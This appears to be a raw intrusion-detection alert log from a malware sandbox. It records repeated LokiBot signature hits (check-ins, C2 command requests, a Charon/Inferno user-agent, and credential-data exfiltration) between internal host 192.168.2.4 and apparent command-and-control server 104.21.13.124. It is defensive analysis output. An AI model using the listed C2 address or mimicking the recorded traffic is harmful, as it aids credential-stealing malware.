04/03/24-06:38:10.724952	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49796	80	192.168.2.4	104.21.13.124
04/03/24-06:38:13.658001	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49800	80	192.168.2.4	104.21.13.124
04/03/24-06:37:38.407237	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49756	80	192.168.2.4	104.21.13.124
04/03/24-06:38:08.198877	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49793	80	192.168.2.4	104.21.13.124
04/03/24-06:38:21.763703	TCP	2025381	ET TROJAN LokiBot Checkin	49811	80	192.168.2.4	104.21.13.124
04/03/24-06:38:03.254673	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49788	80	192.168.2.4	104.21.13.124
04/03/24-06:38:51.813478	TCP	2025381	ET TROJAN LokiBot Checkin	49849	80	192.168.2.4	104.21.13.124
04/03/24-06:37:52.772037	TCP	2025381	ET TROJAN LokiBot Checkin	49774	80	192.168.2.4	104.21.13.124
04/03/24-06:38:32.914570	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49825	80	192.168.2.4	104.21.13.124
04/03/24-06:38:54.009985	TCP	2025381	ET TROJAN LokiBot Checkin	49852	80	192.168.2.4	104.21.13.124
04/03/24-06:38:28.593679	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49819	80	192.168.2.4	104.21.13.124
04/03/24-06:38:15.179954	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49802	80	192.168.2.4	104.21.13.124
04/03/24-06:37:56.609631	TCP	2025381	ET TROJAN LokiBot Checkin	49779	80	192.168.2.4	104.21.13.124
04/03/24-06:38:29.987306	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49821	80	192.168.2.4	104.21.13.124
04/03/24-06:38:03.254673	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49788	80	192.168.2.4	104.21.13.124
04/03/24-06:38:00.331066	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49784	80	192.168.2.4	104.21.13.124
04/03/24-06:38:33.600213	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49826	80	192.168.2.4	104.21.13.124
04/03/24-06:38:32.914570	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49825	80	192.168.2.4	104.21.13.124
04/03/24-06:37:46.959263	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49765	80	192.168.2.4	104.21.13.124
04/03/24-06:37:33.093731	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49749	80	192.168.2.4	104.21.13.124
04/03/24-06:38:12.911562	TCP	2025381	ET TROJAN LokiBot Checkin	49799	80	192.168.2.4	104.21.13.124
04/03/24-06:37:28.125041	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49743	80	192.168.2.4	104.21.13.124
04/03/24-06:37:28.125041	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49743	80	192.168.2.4	104.21.13.124
04/03/24-06:38:12.218805	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49798	80	192.168.2.4	104.21.13.124
04/03/24-06:38:49.748494	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49846	80	192.168.2.4	104.21.13.124
04/03/24-06:37:32.267354	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49748	80	192.168.2.4	104.21.13.124
04/03/24-06:38:27.224947	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49817	80	192.168.2.4	104.21.13.124
04/03/24-06:38:15.873778	TCP	2025381	ET TROJAN LokiBot Checkin	49803	80	192.168.2.4	104.21.13.124
04/03/24-06:38:25.036535	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49814	80	192.168.2.4	104.21.13.124
04/03/24-06:38:27.224947	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49817	80	192.168.2.4	104.21.13.124
04/03/24-06:38:52.638175	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49850	80	192.168.2.4	104.21.13.124
04/03/24-06:38:54.842169	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49853	80	192.168.2.4	104.21.13.124
04/03/24-06:38:24.205256	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49813	80	192.168.2.4	104.21.13.124
04/03/24-06:37:35.452745	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49752	80	192.168.2.4	104.21.13.124
04/03/24-06:38:19.372255	TCP	2025381	ET TROJAN LokiBot Checkin	49808	80	192.168.2.4	104.21.13.124
04/03/24-06:37:47.778229	TCP	2025381	ET TROJAN LokiBot Checkin	49766	80	192.168.2.4	104.21.13.124
04/03/24-06:38:40.106892	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49835	80	192.168.2.4	104.21.13.124
04/03/24-06:38:54.842169	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49853	80	192.168.2.4	104.21.13.124
04/03/24-06:38:37.043826	TCP	2025381	ET TROJAN LokiBot Checkin	49831	80	192.168.2.4	104.21.13.124
04/03/24-06:38:49.062804	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49845	80	192.168.2.4	104.21.13.124
04/03/24-06:37:28.952090	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49744	80	192.168.2.4	104.21.13.124
04/03/24-06:38:01.015339	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49785	80	192.168.2.4	104.21.13.124
04/03/24-06:37:54.423488	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49776	80	192.168.2.4	104.21.13.124
04/03/24-06:38:27.904801	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49818	80	192.168.2.4	104.21.13.124
04/03/24-06:37:57.435447	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49780	80	192.168.2.4	104.21.13.124
04/03/24-06:38:46.022620	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49841	80	192.168.2.4	104.21.13.124
04/03/24-06:38:49.062804	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49845	80	192.168.2.4	104.21.13.124
04/03/24-06:37:34.610079	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49751	80	192.168.2.4	104.21.13.124
04/03/24-06:38:42.416972	TCP	2025381	ET TROJAN LokiBot Checkin	49836	80	192.168.2.4	104.21.13.124
04/03/24-06:37:34.610079	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49751	80	192.168.2.4	104.21.13.124
04/03/24-06:38:30.670976	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49822	80	192.168.2.4	104.21.13.124
04/03/24-06:38:09.042243	TCP	2025381	ET TROJAN LokiBot Checkin	49794	80	192.168.2.4	104.21.13.124
04/03/24-06:37:55.796602	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49778	80	192.168.2.4	104.21.13.124
04/03/24-06:38:23.522239	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49812	80	192.168.2.4	104.21.13.124
04/03/24-06:37:51.243601	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49772	80	192.168.2.4	104.21.13.124
04/03/24-06:38:00.331066	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49784	80	192.168.2.4	104.21.13.124
04/03/24-06:37:58.122430	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49781	80	192.168.2.4	104.21.13.124
04/03/24-06:38:56.921190	TCP	2025381	ET TROJAN LokiBot Checkin	49856	80	192.168.2.4	104.21.13.124
04/03/24-06:37:48.477935	TCP	2025381	ET TROJAN LokiBot Checkin	49767	80	192.168.2.4	104.21.13.124
04/03/24-06:38:00.331066	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49784	80	192.168.2.4	104.21.13.124
04/03/24-06:37:39.958519	TCP	2025381	ET TROJAN LokiBot Checkin	49758	80	192.168.2.4	104.21.13.124
04/03/24-06:37:50.546988	TCP	2025381	ET TROJAN LokiBot Checkin	49770	80	192.168.2.4	104.21.13.124
04/03/24-06:38:25.036535	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49814	80	192.168.2.4	104.21.13.124
04/03/24-06:38:17.269664	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49805	80	192.168.2.4	104.21.13.124
04/03/24-06:38:34.982502	TCP	2025381	ET TROJAN LokiBot Checkin	49828	80	192.168.2.4	104.21.13.124
04/03/24-06:38:09.892413	TCP	2025381	ET TROJAN LokiBot Checkin	49795	80	192.168.2.4	104.21.13.124
04/03/24-06:37:49.855566	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49769	80	192.168.2.4	104.21.13.124
04/03/24-06:38:23.522239	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49812	80	192.168.2.4	104.21.13.124
04/03/24-06:38:44.645218	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49839	80	192.168.2.4	104.21.13.124
04/03/24-06:38:45.335995	TCP	2025381	ET TROJAN LokiBot Checkin	49840	80	192.168.2.4	104.21.13.124
04/03/24-06:38:01.844436	TCP	2025381	ET TROJAN LokiBot Checkin	49786	80	192.168.2.4	104.21.13.124
04/03/24-06:37:36.151380	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49753	80	192.168.2.4	104.21.13.124
04/03/24-06:38:24.205256	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49813	80	192.168.2.4	104.21.13.124
04/03/24-06:38:55.534565	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49854	80	192.168.2.4	104.21.13.124
04/03/24-06:38:01.015339	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49785	80	192.168.2.4	104.21.13.124
04/03/24-06:38:46.856471	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49842	80	192.168.2.4	104.21.13.124
04/03/24-06:37:28.952090	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49744	80	192.168.2.4	104.21.13.124
04/03/24-06:38:38.419517	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49833	80	192.168.2.4	104.21.13.124
04/03/24-06:38:14.340654	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49801	80	192.168.2.4	104.21.13.124
04/03/24-06:38:20.198908	TCP	2025381	ET TROJAN LokiBot Checkin	49809	80	192.168.2.4	104.21.13.124
04/03/24-06:37:28.125041	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49743	80	192.168.2.4	104.21.13.124
04/03/24-06:37:51.243601	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49772	80	192.168.2.4	104.21.13.124
04/03/24-06:37:59.640455	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49783	80	192.168.2.4	104.21.13.124
04/03/24-06:38:51.126318	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49848	80	192.168.2.4	104.21.13.124
04/03/24-06:37:25.764699	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49742	80	192.168.2.4	104.21.13.124
04/03/24-06:38:24.205256	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49813	80	192.168.2.4	104.21.13.124
04/03/24-06:37:25.764699	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49742	80	192.168.2.4	104.21.13.124
04/03/24-06:38:55.534565	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49854	80	192.168.2.4	104.21.13.124
04/03/24-06:37:59.640455	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49783	80	192.168.2.4	104.21.13.124
04/03/24-06:38:18.685116	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49807	80	192.168.2.4	104.21.13.124
04/03/24-06:37:24.221116	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49740	80	192.168.2.4	104.21.13.124
04/03/24-06:38:46.022620	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49841	80	192.168.2.4	104.21.13.124
04/03/24-06:38:56.219175	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49855	80	192.168.2.4	104.21.13.124
04/03/24-06:37:37.702889	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49755	80	192.168.2.4	104.21.13.124
04/03/24-06:38:46.022620	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49841	80	192.168.2.4	104.21.13.124
04/03/24-06:38:32.210551	TCP	2025381	ET TROJAN LokiBot Checkin	49824	80	192.168.2.4	104.21.13.124
04/03/24-06:37:25.030663	TCP	2025381	ET TROJAN LokiBot Checkin	49741	80	192.168.2.4	104.21.13.124
04/03/24-06:38:25.719182	TCP	2025381	ET TROJAN LokiBot Checkin	49815	80	192.168.2.4	104.21.13.124
04/03/24-06:38:11.400710	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49797	80	192.168.2.4	104.21.13.124
04/03/24-06:38:35.672062	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49829	80	192.168.2.4	104.21.13.124
04/03/24-06:38:31.366751	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49823	80	192.168.2.4	104.21.13.124
04/03/24-06:38:03.254673	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49788	80	192.168.2.4	104.21.13.124
04/03/24-06:38:35.672062	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49829	80	192.168.2.4	104.21.13.124
04/03/24-06:38:43.957176	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49838	80	192.168.2.4	104.21.13.124
04/03/24-06:38:33.600213	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49826	80	192.168.2.4	104.21.13.124
04/03/24-06:38:43.957176	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49838	80	192.168.2.4	104.21.13.124
04/03/24-06:37:37.702889	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49755	80	192.168.2.4	104.21.13.124
04/03/24-06:38:47.687505	TCP	2025381	ET TROJAN LokiBot Checkin	49843	80	192.168.2.4	104.21.13.124
04/03/24-06:37:49.163901	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49768	80	192.168.2.4	104.21.13.124
04/03/24-06:38:14.340654	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49801	80	192.168.2.4	104.21.13.124
04/03/24-06:37:36.850228	TCP	2025381	ET TROJAN LokiBot Checkin	49754	80	192.168.2.4	104.21.13.124
04/03/24-06:38:53.324729	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49851	80	192.168.2.4	104.21.13.124
04/03/24-06:38:43.265047	TCP	2025381	ET TROJAN LokiBot Checkin	49837	80	192.168.2.4	104.21.13.124
04/03/24-06:38:20.890742	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49810	80	192.168.2.4	104.21.13.124
04/03/24-06:38:46.856471	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49842	80	192.168.2.4	104.21.13.124
04/03/24-06:38:44.645218	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49839	80	192.168.2.4	104.21.13.124
04/03/24-06:37:58.810149	TCP	2025381	ET TROJAN LokiBot Checkin	49782	80	192.168.2.4	104.21.13.124
04/03/24-06:37:49.855566	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49769	80	192.168.2.4	104.21.13.124
04/03/24-06:37:38.407237	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49756	80	192.168.2.4	104.21.13.124
04/03/24-06:38:11.400710	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49797	80	192.168.2.4	104.21.13.124
04/03/24-06:37:49.163901	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49768	80	192.168.2.4	104.21.13.124
04/03/24-06:37:59.640455	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49783	80	192.168.2.4	104.21.13.124
04/03/24-06:37:51.243601	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49772	80	192.168.2.4	104.21.13.124
04/03/24-06:38:18.685116	TCP	2025381	ET TROJAN LokiBot Checkin	49807	80	192.168.2.4	104.21.13.124
04/03/24-06:37:47.778229	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49766	80	192.168.2.4	104.21.13.124
04/03/24-06:37:51.243601	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49772	80	192.168.2.4	104.21.13.124
04/03/24-06:38:54.842169	TCP	2025381	ET TROJAN LokiBot Checkin	49853	80	192.168.2.4	104.21.13.124
04/03/24-06:38:51.813478	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49849	80	192.168.2.4	104.21.13.124
04/03/24-06:38:05.938500	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49790	80	192.168.2.4	104.21.13.124
04/03/24-06:38:12.911562	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49799	80	192.168.2.4	104.21.13.124
04/03/24-06:38:40.106892	TCP	2025381	ET TROJAN LokiBot Checkin	49835	80	192.168.2.4	104.21.13.124
04/03/24-06:38:05.938500	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49790	80	192.168.2.4	104.21.13.124
04/03/24-06:38:29.987306	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49821	80	192.168.2.4	104.21.13.124
04/03/24-06:38:51.813478	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49849	80	192.168.2.4	104.21.13.124
04/03/24-06:38:15.873778	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49803	80	192.168.2.4	104.21.13.124
04/03/24-06:37:24.221116	TCP	2025381	ET TROJAN LokiBot Checkin	49740	80	192.168.2.4	104.21.13.124
04/03/24-06:37:46.959263	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49765	80	192.168.2.4	104.21.13.124
04/03/24-06:38:55.534565	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49854	80	192.168.2.4	104.21.13.124
04/03/24-06:37:51.947017	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49773	80	192.168.2.4	104.21.13.124
04/03/24-06:38:09.042243	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49794	80	192.168.2.4	104.21.13.124
04/03/24-06:37:58.810149	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49782	80	192.168.2.4	104.21.13.124
04/03/24-06:37:55.108965	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49777	80	192.168.2.4	104.21.13.124
04/03/24-06:37:58.810149	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49782	80	192.168.2.4	104.21.13.124
04/03/24-06:38:20.890742	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49810	80	192.168.2.4	104.21.13.124
04/03/24-06:38:34.282252	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49827	80	192.168.2.4	104.21.13.124
04/03/24-06:37:32.267354	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49748	80	192.168.2.4	104.21.13.124
04/03/24-06:37:54.423488	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49776	80	192.168.2.4	104.21.13.124
04/03/24-06:37:33.791207	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49750	80	192.168.2.4	104.21.13.124
04/03/24-06:37:36.850228	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49754	80	192.168.2.4	104.21.13.124
04/03/24-06:37:55.108965	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49777	80	192.168.2.4	104.21.13.124
04/03/24-06:37:36.850228	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49754	80	192.168.2.4	104.21.13.124
04/03/24-06:38:06.650555	TCP	2025381	ET TROJAN LokiBot Checkin	49791	80	192.168.2.4	104.21.13.124
04/03/24-06:37:33.791207	TCP	2025381	ET TROJAN LokiBot Checkin	49750	80	192.168.2.4	104.21.13.124
04/03/24-06:37:37.702889	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49755	80	192.168.2.4	104.21.13.124
04/03/24-06:38:24.205256	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49813	80	192.168.2.4	104.21.13.124
04/03/24-06:38:49.062804	TCP	2025381	ET TROJAN LokiBot Checkin	49845	80	192.168.2.4	104.21.13.124
04/03/24-06:38:37.043826	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49831	80	192.168.2.4	104.21.13.124
04/03/24-06:38:48.379699	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49844	80	192.168.2.4	104.21.13.124
04/03/24-06:38:46.022620	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49841	80	192.168.2.4	104.21.13.124
04/03/24-06:37:41.484457	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49760	80	192.168.2.4	104.21.13.124
04/03/24-06:38:09.892413	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49795	80	192.168.2.4	104.21.13.124
04/03/24-06:37:48.477935	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49767	80	192.168.2.4	104.21.13.124
04/03/24-06:38:09.892413	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49795	80	192.168.2.4	104.21.13.124
04/03/24-06:38:23.522239	TCP	2025381	ET TROJAN LokiBot Checkin	49812	80	192.168.2.4	104.21.13.124
04/03/24-06:38:43.265047	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49837	80	192.168.2.4	104.21.13.124
04/03/24-06:37:43.987496	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49763	80	192.168.2.4	104.21.13.124
04/03/24-06:38:06.650555	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49791	80	192.168.2.4	104.21.13.124
04/03/24-06:37:45.205065	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49764	80	192.168.2.4	104.21.13.124
04/03/24-06:37:48.477935	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49767	80	192.168.2.4	104.21.13.124
04/03/24-06:38:33.600213	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49826	80	192.168.2.4	104.21.13.124
04/03/24-06:37:45.205065	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49764	80	192.168.2.4	104.21.13.124
04/03/24-06:38:33.600213	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49826	80	192.168.2.4	104.21.13.124
04/03/24-06:37:58.122430	TCP	2025381	ET TROJAN LokiBot Checkin	49781	80	192.168.2.4	104.21.13.124
04/03/24-06:38:56.219175	TCP	2025381	ET TROJAN LokiBot Checkin	49855	80	192.168.2.4	104.21.13.124
04/03/24-06:37:43.152524	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49762	80	192.168.2.4	104.21.13.124
04/03/24-06:38:27.224947	TCP	2025381	ET TROJAN LokiBot Checkin	49817	80	192.168.2.4	104.21.13.124
04/03/24-06:37:49.163901	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49768	80	192.168.2.4	104.21.13.124
04/03/24-06:37:43.152524	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49762	80	192.168.2.4	104.21.13.124
04/03/24-06:38:21.763703	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49811	80	192.168.2.4	104.21.13.124
04/03/24-06:38:32.914570	TCP	2025381	ET TROJAN LokiBot Checkin	49825	80	192.168.2.4	104.21.13.124
04/03/24-06:38:44.645218	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49839	80	192.168.2.4	104.21.13.124
04/03/24-06:38:44.645218	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49839	80	192.168.2.4	104.21.13.124
04/03/24-06:37:56.609631	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49779	80	192.168.2.4	104.21.13.124
04/03/24-06:38:07.360242	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49792	80	192.168.2.4	104.21.13.124
04/03/24-06:38:26.534492	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49816	80	192.168.2.4	104.21.13.124
04/03/24-06:38:07.360242	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49792	80	192.168.2.4	104.21.13.124
04/03/24-06:38:13.658001	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49800	80	192.168.2.4	104.21.13.124
04/03/24-06:38:45.335995	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49840	80	192.168.2.4	104.21.13.124
04/03/24-06:38:08.198877	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49793	80	192.168.2.4	104.21.13.124
04/03/24-06:38:35.672062	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49829	80	192.168.2.4	104.21.13.124
04/03/24-06:37:35.452745	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49752	80	192.168.2.4	104.21.13.124
04/03/24-06:37:36.151380	TCP	2025381	ET TROJAN LokiBot Checkin	49753	80	192.168.2.4	104.21.13.124
04/03/24-06:38:45.335995	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49840	80	192.168.2.4	104.21.13.124
04/03/24-06:37:42.314099	TCP	2025381	ET TROJAN LokiBot Checkin	49761	80	192.168.2.4	104.21.13.124
04/03/24-06:38:01.844436	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49786	80	192.168.2.4	104.21.13.124
04/03/24-06:37:57.435447	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49780	80	192.168.2.4	104.21.13.124
04/03/24-06:38:27.904801	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49818	80	192.168.2.4	104.21.13.124
04/03/24-06:37:53.598973	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49775	80	192.168.2.4	104.21.13.124
04/03/24-06:38:17.972593	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49806	80	192.168.2.4	104.21.13.124
04/03/24-06:37:53.598973	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49775	80	192.168.2.4	104.21.13.124
04/03/24-06:38:52.638175	TCP	2025381	ET TROJAN LokiBot Checkin	49850	80	192.168.2.4	104.21.13.124
04/03/24-06:37:43.987496	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49763	80	192.168.2.4	104.21.13.124
04/03/24-06:38:32.210551	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49824	80	192.168.2.4	104.21.13.124
04/03/24-06:38:27.904801	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49818	80	192.168.2.4	104.21.13.124
04/03/24-06:37:33.093731	TCP	2025381	ET TROJAN LokiBot Checkin	49749	80	192.168.2.4	104.21.13.124
04/03/24-06:37:39.122189	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49757	80	192.168.2.4	104.21.13.124
04/03/24-06:38:54.009985	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49852	80	192.168.2.4	104.21.13.124
04/03/24-06:37:25.030663	TCP	2024312	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1	49741	80	192.168.2.4	104.21.13.124
04/03/24-06:37:28.125041	TCP	2025381	ET TROJAN LokiBot Checkin	49743	80	192.168.2.4	104.21.13.124
04/03/24-06:38:36.358340	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49830	80	192.168.2.4	104.21.13.124
04/03/24-06:38:37.732709	TCP	2025381	ET TROJAN LokiBot Checkin	49832	80	192.168.2.4	104.21.13.124
04/03/24-06:37:39.122189	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49757	80	192.168.2.4	104.21.13.124
04/03/24-06:37:49.163901	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49768	80	192.168.2.4	104.21.13.124
04/03/24-06:38:10.724952	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49796	80	192.168.2.4	104.21.13.124
04/03/24-06:38:36.358340	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49830	80	192.168.2.4	104.21.13.124
04/03/24-06:37:25.030663	TCP	2024317	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2	49741	80	192.168.2.4	104.21.13.124
04/03/24-06:38:10.724952	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49796	80	192.168.2.4	104.21.13.124
04/03/24-06:38:15.179954	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49802	80	192.168.2.4	104.21.13.124
04/03/24-06:38:19.372255	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49808	80	192.168.2.4	104.21.13.124
